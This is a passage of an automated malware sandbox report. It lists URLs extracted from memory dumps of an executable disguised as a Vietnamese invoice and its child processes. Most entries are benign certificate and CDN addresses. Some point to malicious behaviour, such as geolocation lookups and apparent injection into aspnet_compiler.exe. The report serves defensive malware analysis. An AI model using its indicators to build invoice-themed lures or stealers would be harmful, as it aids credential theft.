Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://geoplugin.net/json.gp
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: bhv8995.tmp.39.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://ocsp.digicert.com0B
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.549304612.0000000003638000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.549295120.0000000003618000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://ocsp.digicert.com0E
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://ocsp.digicert.com0F
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://ocsp.digicert.com0K
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://ocsp.digicert.com0M
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: bhv8995.tmp.39.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.538650865.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.537970433.000000000250C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.537475545.00000000024E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: bhvF833.tmp.14.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
